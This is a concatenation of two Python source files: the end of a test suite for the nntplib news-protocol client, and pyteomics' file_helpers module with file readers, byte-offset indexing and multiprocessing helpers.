["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref", "distribution"])
# A classic response from INN
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:", "Xref:full"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref"])
def test_parse_overview(self):
fmt = nntplib._DEFAULT_OVERVIEW_FMT + ["xref"]
# First example from RFC 3977
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<[email protected]>\t6 Oct 1998 04:38:40 -0500\t'
'<[email protected]>\t<[email protected]>\t1234\t'
'17\tXref: news.example.com misc.test:3000363',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(art_num, 3000234)
self.assertEqual(fields, {
'subject': 'I am just a test article',
'from': '"Demo User" <[email protected]>',
'date': '6 Oct 1998 04:38:40 -0500',
'message-id': '<[email protected]>',
'references': '<[email protected]>',
':bytes': '1234',
':lines': '17',
'xref': 'news.example.com misc.test:3000363',
})
# Second example; here the "Xref" field is totally absent (including
# the header name) and comes out as None
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<[email protected]>\t6 Oct 1998 04:38:40 -0500\t'
'<[email protected]>\t<[email protected]>\t1234\t'
'17\t\t',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(fields['xref'], None)
# Third example; the "Xref" is an empty string, while "references"
# is a single space.
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<[email protected]>\t6 Oct 1998 04:38:40 -0500\t'
'<[email protected]>\t \t1234\t'
'17\tXref: \t',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(fields['references'], ' ')
self.assertEqual(fields['xref'], '')
def test_parse_datetime(self):
def gives(a, b, *c):
self.assertEqual(nntplib._parse_datetime(a, b),
datetime.datetime(*c))
# Output of DATE command
gives("19990623135624", None, 1999, 6, 23, 13, 56, 24)
# Variations
gives("19990623", "135624", 1999, 6, 23, 13, 56, 24)
gives("990623", "135624", 1999, 6, 23, 13, 56, 24)
gives("090623", "135624", 2009, 6, 23, 13, 56, 24)
def test_unparse_datetime(self):
# Test non-legacy mode
# 1) with a datetime
def gives(y, M, d, h, m, s, date_str, time_str):
dt = datetime.datetime(y, M, d, h, m, s)
self.assertEqual(nntplib._unparse_datetime(dt),
(date_str, time_str))
self.assertEqual(nntplib._unparse_datetime(dt, False),
(date_str, time_str))
gives(1999, 6, 23, 13, 56, 24, "19990623", "135624")
gives(2000, 6, 23, 13, 56, 24, "20000623", "135624")
gives(2010, 6, 5, 1, 2, 3, "20100605", "010203")
# 2) with a date
def gives(y, M, d, date_str, time_str):
dt = datetime.date(y, M, d)
self.assertEqual(nntplib._unparse_datetime(dt),
(date_str, time_str))
self.assertEqual(nntplib._unparse_datetime(dt, False),
(date_str, time_str))
gives(1999, 6, 23, "19990623", "000000")
gives(2000, 6, 23, "20000623", "000000")
gives(2010, 6, 5, "20100605", "000000")
def test_unparse_datetime_legacy(self):
# Test legacy mode (RFC 977)
# 1) with a datetime
def gives(y, M, d, h, m, s, date_str, time_str):
dt = datetime.datetime(y, M, d, h, m, s)
self.assertEqual(nntplib._unparse_datetime(dt, True),
(date_str, time_str))
gives(1999, 6, 23, 13, 56, 24, "990623", "135624")
gives(2000, 6, 23, 13, 56, 24, "000623", "135624")
gives(2010, 6, 5, 1, 2, 3, "100605", "010203")
# 2) with a date
def gives(y, M, d, date_str, time_str):
dt = datetime.date(y, M, d)
self.assertEqual(nntplib._unparse_datetime(dt, True),
(date_str, time_str))
gives(1999, 6, 23, "990623", "000000")
gives(2000, 6, 23, "000623", "000000")
gives(2010, 6, 5, "100605", "000000")
@unittest.skipUnless(ssl, 'requires SSL support')
def test_ssl_support(self):
self.assertTrue(hasattr(nntplib, 'NNTP_SSL'))
class PublicAPITests(unittest.TestCase):
"""Ensures that the correct values are exposed in the public API."""
def test_module_all_attribute(self):
self.assertTrue(hasattr(nntplib, '__all__'))
target_api = ['NNTP', 'NNTPError', 'NNTPReplyError',
'NNTPTemporaryError', 'NNTPPermanentError',
'NNTPProtocolError', 'NNTPDataError', 'decode_header']
if ssl is not None:
target_api.append('NNTP_SSL')
self.assertEqual(set(nntplib.__all__), set(target_api))
class MockSocketTests(unittest.TestCase):
"""Tests involving a mock socket object
Used where the _NNTPServerIO file object is not enough."""
nntp_class = nntplib.NNTP
def check_constructor_error_conditions(
self, handler_class,
expected_error_type, expected_error_msg,
login=None, password=None):
class mock_socket_module:
def create_connection(address, timeout):
return MockSocket()
class MockSocket:
def close(self):
nonlocal socket_closed
socket_closed = True
def makefile(socket, mode):
handler = handler_class()
_, file = make_mock_file(handler)
files.append(file)
return file
socket_closed = False
files = []
with patch('nntplib.socket', mock_socket_module), \
self.assertRaisesRegex(expected_error_type, expected_error_msg):
self.nntp_class('dummy', user=login, password=password)
self.assertTrue(socket_closed)
for f in files:
self.assertTrue(f.closed)
def test_bad_welcome(self):
#Test a bad welcome message
class Handler(NNTPv1Handler):
welcome = 'Bad Welcome'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPProtocolError, Handler.welcome)
def test_service_temporarily_unavailable(self):
#Test service temporarily unavailable
class Handler(NNTPv1Handler):
welcome = '400 Service temporarily unavailable'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPTemporaryError, Handler.welcome)
def test_service_permanently_unavailable(self):
#Test service permanently unavailable
class Handler(NNTPv1Handler):
welcome = '502 Service permanently unavailable'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPPermanentError, Handler.welcome)
def test_bad_capabilities(self):
#Test a bad capabilities response
class Handler(NNTPv1Handler):
def handle_CAPABILITIES(self):
self.push_lit(capabilities_response)
capabilities_response = '201 bad capability'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPReplyError, capabilities_response)
def test_login_aborted(self):
#Test a bad authinfo response
login = '[email protected]'
password = 'python'
class Handler(NNTPv1Handler):
def handle_AUTHINFO(self, *args):
self.push_lit(authinfo_response)
authinfo_response = '503 Mechanism not recognized'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPPermanentError, authinfo_response,
login, password)
class bypass_context:
"""Bypass encryption and actual SSL module"""
def wrap_socket(sock, **args):
return sock
@unittest.skipUnless(ssl, 'requires SSL support')
class MockSslTests(MockSocketTests):
@staticmethod
def nntp_class(*pos, **kw):
return nntplib.NNTP_SSL(*pos, ssl_context=bypass_context, **kw)
class LocalServerTests(unittest.TestCase):
def setUp(self):
sock = socket.socket()
port = support.bind_port(sock)
sock.listen()
self.background = threading.Thread(
target=self.run_server, args=(sock,))
self.background.start()
self.addCleanup(self.background.join)
self.nntp = NNTP(support.HOST, port, usenetrc=False).__enter__()
self.addCleanup(self.nntp.__exit__, None, None, None)
def run_server(self, sock):
# Could be generalized to handle more commands in separate methods
with sock:
[client, _] = sock.accept()
with contextlib.ExitStack() as cleanup:
cleanup.enter_context(client)
reader = cleanup.enter_context(client.makefile('rb'))
client.sendall(b'200 Server ready\r\n')
while True:
cmd = reader.readline()
if cmd == b'CAPABILITIES\r\n':
client.sendall(
b'101 Capability list:\r\n'
b'VERSION 2\r\n'
b'STARTTLS\r\n'
b'.\r\n'
)
elif cmd == b'STARTTLS\r\n':
reader.close()
client.sendall(b'382 Begin TLS negotiation now\r\n')
context = ssl.SSLContext()
context.load_cert_chain(certfile)
client = context.wrap_socket(
client, server_side=True)
cleanup.enter_context(client)
reader = cleanup.enter_context(client.makefile('rb'))
elif cmd == b'QUIT\r\n':
client.sendall(b'205 Bye!\r\n')
break
else:
raise ValueError('Unexpected command {!r}'.format(cmd))
@unittest.skipUnless(ssl, 'requires SSL support')
def test_starttls(self):
file = self.nntp.file
sock = self.nntp.sock
self.nntp.starttls()
# Check that the socket and internal pseudo-file really were
# changed.
self.assertNotEqual(file, self.nntp.file)
self.assertNotEqual(sock, self.nntp.sock)
# Check that the new socket really is an SSL one
self.assertIsInstance(self.nntp.sock, ssl.SSLSocket)
# Check that trying starttls when it's already active fails.
self.assertRaises(ValueError, self.nntp.starttls)
if __name__ == "__main__":
unittest.main()
|
file_helpers.py
|
import sys
import codecs
import re
from functools import wraps
from contextlib import contextmanager
from collections import OrderedDict, defaultdict
import json
import multiprocessing as mp
import threading
import warnings
import os
from abc import ABCMeta
try:
basestring
except NameError:
basestring = (str, bytes)
try:
import pandas as pd
except ImportError:
pd = None
try:
import numpy as np
except ImportError:
np = None
try:
import dill
except ImportError:
dill = None
try:
import cPickle as pickle
except ImportError:
import pickle
serializer = pickle
else:
serializer = dill
try:
from queue import Empty
except ImportError:
from Queue import Empty
try:
from collections.abc import Sequence
except ImportError:
from collections import Sequence
from .structures import PyteomicsError
from .utils import add_metaclass
def _keepstate(func):
"""Decorator to help keep the position in open files passed as
positional arguments to functions"""
@wraps(func)
def wrapped(*args, **kwargs):
positions = [getattr(arg, 'seek', None) and getattr(arg, 'tell', type(None))() for arg in args]
for arg, pos in zip(args, positions):
if pos is not None:
arg.seek(0)
res = func(*args, **kwargs)
for arg, pos in zip(args, positions):
if pos is not None:
try:
arg.seek(pos)
except ValueError:
pass
return res
return wrapped
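# A minimal usage sketch (the parser name below is hypothetical): _keepstate rewinds any
# seekable positional argument to the start of the file before the call and restores its
# original position afterwards, so repeated parses see the whole input.
#
#     @_keepstate
#     def _count_records(source):
#         return sum(1 for _ in source)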
def _keepstate_method(func):
"""Decorator for :py:class:`FileReader` methods to help keep the position
in the underlying file.
"""
@wraps(func)
def wrapped(self, *args, **kwargs):
position = self.tell()
self.seek(0)
try:
return func(self, *args, **kwargs)
finally:
self.seek(position)
return wrapped
class _file_obj(object):
"""Check if `f` is a file name and open the file in `mode`.
A context manager."""
def __init__(self, f, mode, encoding=None):
self._file_spec = None
self.mode = mode
if f is None:
self.file = {'r': sys.stdin, 'a': sys.stdout, 'w': sys.stdout
}[mode[0]]
self._file_spec = None
elif isinstance(f, basestring):
self.file = codecs.open(f, mode, encoding)
self._file_spec = f
else:
self._file_spec = f
self.file = f
self.encoding = getattr(self.file, 'encoding', encoding)
self.close_file = (self.file is not f)
def __enter__(self):
return self
def __reduce_ex__(self, protocol):
return self.__class__, (self._file_spec, self.mode, self.encoding)
def __exit__(self, *args, **kwargs):
if (not self.close_file) or self._file_spec is None:
return # do nothing
# clean up
exit = getattr(self.file, '__exit__', None)
if exit is not None:
return exit(*args, **kwargs)
else:
exit = getattr(self.file, 'close', None)
if exit is not None:
exit()
def __getattr__(self, attr):
return getattr(self.file, attr)
def __iter__(self):
return iter(self.file)
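# Illustrative sketch (not part of the original module): `_file_obj` accepts either a
# path or an existing file-like object and only closes what it opened itself. The file
# name below is hypothetical.
#
#     with _file_obj('spectra.txt', 'r') as f:    # opened and closed by _file_obj
#         header = f.readline()
#
#     existing = open('spectra.txt')
#     with _file_obj(existing, 'r') as f:         # wrapped only; `existing` stays open
#         header = f.readline()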
class NoOpBaseReader(object):
def __init__(self, *args, **kwargs):
pass
class IteratorContextManager(NoOpBaseReader):
def __init__(self, *args, **kwargs):
self._func = kwargs.pop('parser_func')
self._args = args
self._kwargs = kwargs
if type(self) == IteratorContextManager:
self.reset()
super(IteratorContextManager, self).__init__(*args, **kwargs)
def __getstate__(self):
state = {}
state['_iterator_args'] = self._args
state['_iterator_kwargs'] = self._kwargs
return state
def __setstate__(self, state):
self._args = state['_iterator_args']
self._kwargs = state['_iterator_kwargs']
def reset(self):
"""Resets the iterator to its initial state."""
try:
self._reader = self._func(*self._args, **self._kwargs)
except Exception:
self.__exit__(*sys.exc_info())
raise
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
pass
def __iter__(self):
return self
def __next__(self):
# try:
return next(self._reader)
# except StopIteration:
# self.__exit__(None, None, None)
# raise
next = __next__
@add_metaclass(ABCMeta)
class FileReader(IteratorContextManager):
"""Abstract class implementing context manager protocol
for file readers.
"""
def __init__(self, source, **kwargs):
func = kwargs['parser_func']
super(FileReader, self).__init__(*kwargs['args'], parser_func=func, **kwargs['kwargs'])
self._pass_file = kwargs['pass_file']
self._source_init = source
self._mode = kwargs['mode']
self._encoding = kwargs.get('encoding')
self.reset()
def reset(self):
if hasattr(self, '_source'):
self._source.__exit__(None, None, None)
self._source = _file_obj(self._source_init, self._mode, self._encoding)
try:
if self._pass_file:
self._reader = self._func(
self._source, *self._args, **self._kwargs)
else:
self._reader = self._func(*self._args, **self._kwargs)
except Exception: # clean up on any error
self.__exit__(*sys.exc_info())
raise
def __exit__(self, *args, **kwargs):
self._source.__exit__(*args, **kwargs)
# delegate everything else to file object
def __getattr__(self, attr):
if attr == '_source':
raise AttributeError
return getattr(self._source, attr)
def remove_bom(bstr):
return bstr.replace(codecs.BOM_LE, b'').lstrip(b"\x00")
class IndexedReaderMixin(NoOpBaseReader):
"""Common interface for :py:class:`IndexedTextReader` and :py:class:`IndexedXML`."""
@property
def index(self):
return self._offset_index
@property
def default_index(self):
return self._offset_index
def __len__(self):
return len(self._offset_index)
def __contains__(self, key):
return key in self._offset_index
def _item_from_offsets(self, offsets):
raise NotImplementedError
def get_by_id(self, elem_id):
index = self.default_index
if index is None:
raise PyteomicsError('Access by ID requires building an offset index.')
offsets = index[elem_id]
return self._item_from_offsets(offsets)
def get_by_ids(self, ids):
return [self.get_by_id(key) for key in ids]
def get_by_index(self, i):
try:
key = self.default_index.from_index(i, False)
except AttributeError:
raise PyteomicsError('Positional access requires building an offset index.')
return self.get_by_id(key)
def get_by_indexes(self, indexes):
return [self.get_by_index(i) for i in indexes]
def get_by_index_slice(self, s):
try:
keys = self.default_index.from_slice(s, False)
except AttributeError:
raise PyteomicsError('Positional access requires building an offset index.')
return self.get_by_ids(keys)
def get_by_key_slice(self, s):
keys = self.default_index.between(s.start, s.stop)
if s.step:
keys = keys[::s.step]
return self.get_by_ids(keys)
def __getitem__(self, key):
if isinstance(key, basestring):
return self.get_by_id(key)
if isinstance(key, int):
return self.get_by_index(key)
if isinstance(key, Sequence):
if not key:
return []
if isinstance(key[0], int):
return self.get_by_indexes(key)
if isinstance(key[0], basestring):
return self.get_by_ids(key)
if isinstance(key, slice):
for item in (key.start, key.stop, key.step):
if item is not None:
break
if isinstance(item, int):
return self.get_by_index_slice(key)
if isinstance(item, basestring):
return self.get_by_key_slice(key)
if item is None:
return list(self)
raise PyteomicsError('Unsupported query key: {}'.format(key))
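# Illustrative sketch (not part of the original module): the access patterns dispatched
# by `IndexedReaderMixin.__getitem__` above, assuming `reader` is an indexed reader and
# the IDs shown are hypothetical.
#
#     reader['scan=1']               # single ID             -> get_by_id
#     reader[0]                      # integer position      -> get_by_index
#     reader[[0, 2, 5]]              # sequence of ints      -> get_by_indexes
#     reader[['scan=1', 'scan=2']]   # sequence of IDs       -> get_by_ids
#     reader[1:10:2]                 # slice of positions    -> get_by_index_slice
#     reader['scan=1':'scan=9']      # slice of IDs          -> get_by_key_slice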
class RTLocator():
def __init__(self, reader):
self._reader = reader
def _get_scan_by_time(self, time):
"""Retrieve the scan object for the specified scan time.
Parameters
----------
time : float
The time to get the nearest scan from
Returns
-------
tuple: (scan_id, scan, scan_time)
"""
if not self._reader.default_index:
raise PyteomicsError("This method requires the index. Please pass `use_index=True` during initialization")
scan_ids = tuple(self._reader.default_index)
lo = 0
hi = len(scan_ids)
best_match = None
best_error = float('inf')
best_time = None
best_id = None
if time == float('inf'):
scan = self._reader.get_by_id(scan_ids[-1])
return scan_ids[-1], scan, self._reader._get_time(scan)
while hi != lo:
mid = (hi + lo) // 2
sid = scan_ids[mid]
scan = self._reader.get_by_id(sid)
scan_time = self._reader._get_time(scan)
err = abs(scan_time - time)
if err < best_error:
best_error = err
best_match = scan
best_time = scan_time
best_id = sid
if scan_time == time:
return sid, scan, scan_time
elif (hi - lo) == 1:
return best_id, best_match, best_time
elif scan_time > time:
hi = mid
else:
lo = mid
def __getitem__(self, key):
if isinstance(key, (int, float)):
return self._get_scan_by_time(key)[1]
if isinstance(key, Sequence):
return [self._get_scan_by_time(t)[1] for t in key]
if isinstance(key, slice):
if key.start is None:
start_index = self._reader.default_index.from_index(0)
else:
start_index = self._get_scan_by_time(key.start)[0]
if key.stop is None:
stop_index = self._reader.default_index.from_index(-1)
else:
stop_index = self._get_scan_by_time(key.stop)[0]
return self._reader[start_index:stop_index:key.step]
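# Illustrative sketch (not part of the original module): `RTLocator` is exposed as the
# `time` attribute of `TimeOrderedIndexedReaderMixin` (defined below), so scans can be
# looked up by retention time instead of ID. The values are hypothetical.
#
#     reader.time[12.5]          # scan closest to retention time 12.5 (binary search)
#     reader.time[10.0:20.0]     # all scans between the two nearest retention times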
class TimeOrderedIndexedReaderMixin(IndexedReaderMixin):
@property
def time(self):
return self._time
def __init__(self, *args, **kwargs):
super(TimeOrderedIndexedReaderMixin, self).__init__(*args, **kwargs)
self._time = RTLocator(self)
@staticmethod
def _get_time(scan):
raise NotImplementedError
class IndexedTextReader(IndexedReaderMixin, FileReader):
"""Abstract class for text file readers that keep an index of records for random access.
This requires reading the file in binary mode."""
delimiter = None
label = None
block_size = 1000000
label_group = 1
def __init__(self, source, **kwargs):
# the underlying _file_obj gets None as encoding
# to avoid transparent decoding of StreamReader on read() calls
encoding = kwargs.pop('encoding', 'utf-8')
super(IndexedTextReader, self).__init__(source, mode='rb', encoding=None, **kwargs)
self.encoding = encoding
for attr in ['delimiter', 'label', 'block_size', 'label_group']:
if attr in kwargs:
setattr(self, attr, kwargs.pop(attr))
self._offset_index = None
if not kwargs.pop('_skip_index', False):
self._offset_index = self.build_byte_index()
def __getstate__(self):
state = super(IndexedTextReader, self).__getstate__()
state['offset_index'] = self._offset_index
return state
def __setstate__(self, state):
super(IndexedTextReader, self).__setstate__(state)
self._offset_index = state['offset_index']
def _chunk_iterator(self):
fh = self._source.file
delim = remove_bom(self.delimiter.encode(self.encoding))
buff = fh.read(self.block_size)
parts = buff.split(delim)
started_with_delim = buff.startswith(delim)
tail = parts[-1]
front = parts[:-1]
i = 0
for part in front:
i += 1
if part == b"":
continue
if i == 1:
if started_with_delim:
yield delim + part
else:
yield part
else:
yield delim + part
running = True
while running:
buff = fh.read(self.block_size)
if len(buff) == 0:
running = False
buff = tail
else:
buff = tail + buff
parts = buff.split(delim)
tail = parts[-1]
front = parts[:-1]
for part in front:
yield delim + part
yield delim + tail
def _generate_offsets(self):
i = 0
pattern = re.compile(remove_bom(self.label.encode(self.encoding)))
for chunk in self._chunk_iterator():
match = pattern.search(chunk)
if match:
label = match.group(self.label_group)
yield i, label.decode(self.encoding), match
i += len(chunk)
yield i, None, None
def build_byte_index(self):
index = OffsetIndex()
g = self._generate_offsets()
last_offset = 0
last_label = None
for offset, label, keyline in g:
if last_label is not None:
index[last_label] = (last_offset, offset)
last_label = label
last_offset = offset
assert last_label is None
return index
def _read_lines_from_offsets(self, start, end):
self._source.seek(start)
lines = self._source.read(end - start).decode(self.encoding).split('\n')
return lines
class IndexSavingMixin(NoOpBaseReader):
"""Common interface for :py:class:`IndexSavingXML` and :py:class:`IndexSavingTextReader`."""
_index_class = NotImplemented
@property
def _byte_offset_filename(self):
try:
path = self._source.name
except AttributeError:
return None
name, ext = os.path.splitext(path)
byte_offset_filename = '{}-{}-byte-offsets.json'.format(name, ext[1:])
return byte_offset_filename
def _check_has_byte_offset_file(self):
"""Check if the file at :attr:`_byte_offset_filename` exists
Returns
-------
bool
Whether the file exists
"""
path = self._byte_offset_filename
if path is None:
return False
return os.path.exists(path)
@classmethod
def prebuild_byte_offset_file(cls, path):
"""Construct a new XML reader, build its byte offset index and
write it to file
Parameters
----------
path : str
The path to the file to parse
"""
with cls(path) as inst:
inst.write_byte_offsets()
def write_byte_offsets(self):
"""Write the byte offsets in :attr:`_offset_index` to the file
at :attr:`_byte_offset_filename`
"""
with open(self._byte_offset_filename, 'w') as f:
self._offset_index.save(f)
@_keepstate_method
def _build_index(self):
"""Build the byte offset index by either reading these offsets
from the file at :attr:`_byte_offset_filename`, or falling back
to the method used by :class:`IndexedXML` if this operation fails
due to an IOError
"""
if not self._use_index: return
try:
self._read_byte_offsets()
except (IOError, AttributeError, TypeError):
super(IndexSavingMixin, self)._build_index()
def _read_byte_offsets(self):
"""Read the byte offset index JSON file at :attr:`_byte_offset_filename`
and populate :attr:`_offset_index`
"""
with open(self._byte_offset_filename, 'r') as f:
index = self._index_class.load(f)
self._offset_index = index
def _file_reader(_mode='r'):
# a lot of the code below is borrowed from
# http://stackoverflow.com/a/14095585/1258041
def decorator(_func):
"""A decorator implementing the context manager protocol for functions
that read files.
Note: 'close' must be in kwargs! Otherwise it won't be respected.
"""
@wraps(_func)
def helper(*args, **kwargs):
if args:
return FileReader(args[0], mode=_mode, parser_func=_func, pass_file=True, args=args[1:], kwargs=kwargs,
encoding=kwargs.pop('encoding', None))
source = kwargs.pop('source', None)
return FileReader(source, mode=_mode, parser_func=_func, pass_file=True, args=(), kwargs=kwargs, encoding=kwargs.pop('encoding', None))
return helper
return decorator
def _file_writer(_mode='a'):
def decorator(_func):
"""A decorator that opens output files for writer functions.
"""
@wraps(_func)
def helper(*args, **kwargs):
m = kwargs.pop('file_mode', _mode)
enc = kwargs.pop('encoding', None)
if len(args) > 1:
with _file_obj(args[1], m, encoding=enc) as out:
return _func(args[0], out, *args[2:], **kwargs)
else:
with _file_obj(kwargs.pop('output', None), m, encoding=enc) as out:
return _func(*args, output=out, **kwargs)
return helper
return decorator
class WritableIndex(object):
schema_version = (1, 0, 0)
_schema_version_tag_key = "@pyteomics_schema_version"
def _serializable_container(self):
container = {'index': list(self.items())}
return container
def save(self, fp):
container = self._serializable_container()
container[self._schema_version_tag_key] = self.schema_version
json.dump(container, fp)
@classmethod
def load(cls, fp):
container = json.load(fp, object_hook=OrderedDict)
version_tag = container.get(cls._schema_version_tag_key)
if version_tag is None:
# The legacy case, no special processing yet
inst = cls()
inst.schema_version = None
return inst
version_tag = tuple(version_tag)
index = container.get("index")
if version_tag < cls.schema_version:
# schema upgrade case, no special processing yet
inst = cls(index)
inst.schema_version = version_tag
return inst
# no need to upgrade
return cls(index)
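# Illustrative sketch (not part of the original module): the save/load round trip
# implemented above, using `OffsetIndex` (defined just below) and a hypothetical path.
# `save` adds the schema version tag to the JSON payload; `load` strips it off again.
#
#     index = OffsetIndex([('id1', (0, 100)), ('id2', (100, 250))])
#     with open('offsets.json', 'w') as f:
#         index.save(f)
#     with open('offsets.json') as f:
#         restored = OffsetIndex.load(f)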
class OffsetIndex(OrderedDict, WritableIndex):
'''An augmented OrderedDict that formally wraps getting items by index
'''
def __init__(self, *args, **kwargs):
super(OffsetIndex, self).__init__(*args, **kwargs)
self._index_sequence = None
def _invalidate(self):
self._index_sequence = None
@property
def index_sequence(self):
"""Keeps a cached copy of the :meth:`items` sequence
stored as a :class:`tuple` to avoid repeatedly copying
the sequence over many method calls.
Returns
-------
:class:`tuple`
"""
if self._index_sequence is None:
self._index_sequence = tuple(self.items())
return self._index_sequence
def __setitem__(self, key, value):
self._invalidate()
return super(OffsetIndex, self).__setitem__(key, value)
def pop(self, *args, **kwargs):
self._invalidate()
return super(OffsetIndex, self).pop(*args, **kwargs)
def find(self, key, *args, **kwargs):
return self[key]
def from_index(self, index, include_value=False):
'''Get an entry by its integer index in the ordered sequence
of this mapping.
Parameters
----------
index: int
The index to retrieve.
include_value: bool
Whether to return both the key and the value or just the key.
Defaults to :const:`False`.
Returns
-------
object:
If ``include_value`` is :const:`True`, a tuple of (key, value) at ``index``
else just the key at ``index``.
'''
items = self.index_sequence
if include_value:
return items[index]
else:
return items[index][0]
def from_slice(self, spec, include_value=False):
'''Get a slice along index in the ordered sequence
of this mapping.
Parameters
----------
spec: slice
The slice over the range of indices to retrieve
include_value: bool
Whether to return both the key and the value or just the key.
Defaults to :const:`False`
Returns
-------
list:
If ``include_value`` is :const:`True`, a tuple of (key, value) at ``index``
else just the key at ``index`` for each ``index`` in ``spec``
'''
items = self.index_sequence
return [(k, v) if include_value else k for k, v in items[spec]]
def between(self, start, stop, include_value=False):
keys = list(self)
if start is not None:
try:
start_index = keys.index(start)
except ValueError:
raise KeyError(start)
else:
start_index = 0
if stop is not None:
try:
stop_index = keys.index(stop)
except ValueError:
raise KeyError(stop)
else:
stop_index = len(keys) - 1
if start is None or stop is None:
pass # won't switch indices
else:
start_index, stop_index = min(start_index, stop_index), max(start_index, stop_index)
if include_value:
return [(k, self[k]) for k in keys[start_index:stop_index + 1]]
return keys[start_index:stop_index + 1]
def __repr__(self):
template = "{self.__class__.__name__}({items})"
return template.format(self=self, items=list(self.items()))
def _integrity_check(self):
indices = list(self.values())
sorted_indices = sorted(self.values())
return indices == sorted_indices
def sort(self):
sorted_pairs = sorted(self.items(), key=lambda x: x[1])
self.clear()
self._invalidate()
for key, value in sorted_pairs:
self[key] = value
return self
class IndexSavingTextReader(IndexSavingMixin, IndexedTextReader):
_index_class = OffsetIndex
class HierarchicalOffsetIndex(WritableIndex):
_inner_type = OffsetIndex
def __init__(self, base=None):
self.mapping = defaultdict(self._inner_type)
for key, value in (base or {}).items():
self.mapping[key] = self._inner_type(value)
def _integrity_check(self):
for key, value in self.items():
if not value._integrity_check():
return False
return True
def sort(self):
for key, value in self.items():
value.sort()
return self
def __getitem__(self, key):
return self.mapping[key]
def __setitem__(self, key, value):
self.mapping[key] = value
def __iter__(self):
return iter(self.mapping)
def __len__(self):
return sum(len(group) for key, group in self.items())
def __contains__(self, key):
return key in self.mapping
def find(self, key, element_type=None):
if element_type is None:
for element_type in self.keys():
try:
return self.find(key, element_type)
except KeyError:
continue
raise KeyError(key)
else:
return self[element_type][key]
def find_no_type(self, key):
"""Try to find `key` in each of the lower-level indexes, returning both
value and the element type that match the key."""
for element_type in self.keys():
try:
return self.find(key, element_type), element_type
except KeyError:
continue
raise KeyError(key)
def update(self, *args, **kwargs):
self.mapping.update(*args, **kwargs)
def pop(self, key, default=None):
return self.mapping.pop(key, default)
def keys(self):
return self.mapping.keys()
def values(self):
return self.mapping.values()
def items(self):
return self.mapping.items()
def _serializable_container(self):
encoded_index = {}
container = {
'keys': list(self.keys())
}
for key, offset in self.items():
encoded_index[key] = list(offset.items())
container['index'] = encoded_index
return container
def _make_chain(reader, readername, full_output=False):
def concat_results(*args, **kwargs):
results = [reader(arg, **kwargs) for arg in args]
        if pd is not None and all(isinstance(a, pd.DataFrame) for a in results):
return pd.concat(results)
return np.concatenate(results)
def _iter(files, kwargs):
for f in files:
with reader(f, **kwargs) as r:
for item in r:
yield item
def chain(*files, **kwargs):
return _iter(files, kwargs)
def from_iterable(files, **kwargs):
return _iter(files, kwargs)
@contextmanager
def _chain(*files, **kwargs):
yield chain(*files, **kwargs)
@contextmanager
def _from_iterable(files, **kwargs):
yield from_iterable(files, **kwargs)
def dispatch(*args, **kwargs):
return dispatch_from_iterable(args, **kwargs)
def dispatch_from_iterable(args, **kwargs):
if kwargs.get('full_output', full_output):
return concat_results(*args, **kwargs)
return _chain(*args, **kwargs)
dispatch.__doc__ = """Chain :py:func:`{0}` for several files.
Positional arguments should be file names or file objects.
Keyword arguments are passed to the :py:func:`{0}` function.
""".format(readername)
dispatch_from_iterable.__doc__ = """Chain :py:func:`{0}` for several files.
Keyword arguments are passed to the :py:func:`{0}` function.
Parameters
----------
files : iterable
Iterable of file names or file objects.
""".format(readername)
dispatch.from_iterable = dispatch_from_iterable
return dispatch
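# Illustrative sketch (not part of the original module): a format module would typically
# expose the result of `_make_chain` as its `chain` function. The reader function and
# file names below are hypothetical.
#
#     chain = _make_chain(read, 'read')
#     with chain('run1.mgf', 'run2.mgf') as entries:      # iterate both files in order
#         for entry in entries:
#             ...
#     chain.from_iterable(['run1.mgf', 'run2.mgf'])       # same, from an iterable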
def _check_use_index(source, use_index, default):
try:
if use_index is not None:
use_index = bool(use_index)
# if a file name is given, do not override anything; short-circuit
if isinstance(source, basestring):
return use_index if use_index is not None else default
# collect information on source
if hasattr(source, 'seekable'):
seekable = source.seekable()
else:
seekable = None
if hasattr(source, 'mode'):
binary = 'b' in source.mode
else:
binary = None
# now check for conflicts
if seekable is False:
if binary:
raise PyteomicsError('Cannot work with non-seekable file in binary mode: {}.'.format(source))
if use_index:
warnings.warn('Cannot use indexing as {} is not seekable. Setting `use_index` to False.'.format(source))
use_index = False
elif binary is not None:
if use_index is not None and binary != use_index:
warnings.warn('use_index is {}, but the file mode is {}. '
'Setting `use_index` to {}'.format(use_index, source.mode, binary))
use_index = binary
else:
warnings.warn('Could not check mode on {}. Specify `use_index` explicitly to avoid errors.'.format(source))
if use_index is not None:
return use_index
return default
except PyteomicsError:
raise
except Exception as e:
warnings.warn('Could not check mode on {}. Reason: {!r}. Specify `use_index` explicitly to avoid errors.'.format(source, e))
if use_index is not None:
return use_index
return default
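# Illustrative sketch (not part of the original module): how the checks above resolve
# for a few typical sources (the path is hypothetical).
#
#     _check_use_index('data.mzML', None, True)              # file name -> default (True)
#     _check_use_index(open('data.mzML', 'rb'), None, True)  # seekable binary file -> True
#     _check_use_index(sys.stdin, True, True)                # interactive stdin is not
#                                                            # seekable -> warns, False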
class FileReadingProcess(mp.Process):
"""Process that does a share of distributed work on entries read from file.
    Reconstructs a reader object, parses entries from the given indexes,
optionally does additional processing, sends results back.
The reader class must support the :py:meth:`__getitem__` dict-like lookup.
"""
def __init__(self, reader_spec, target_spec, qin, qout, args_spec, kwargs_spec):
super(FileReadingProcess, self).__init__(name='pyteomics-map-worker')
self.reader_spec = reader_spec
self.target_spec = target_spec
self.args_spec = args_spec
self.kwargs_spec = kwargs_spec
self._qin = qin
self._qout = qout
# self._in_flag = in_flag
self._done_flag = mp.Event()
self.daemon = True
def run(self):
reader = serializer.loads(self.reader_spec)
target = serializer.loads(self.target_spec)
args = serializer.loads(self.args_spec)
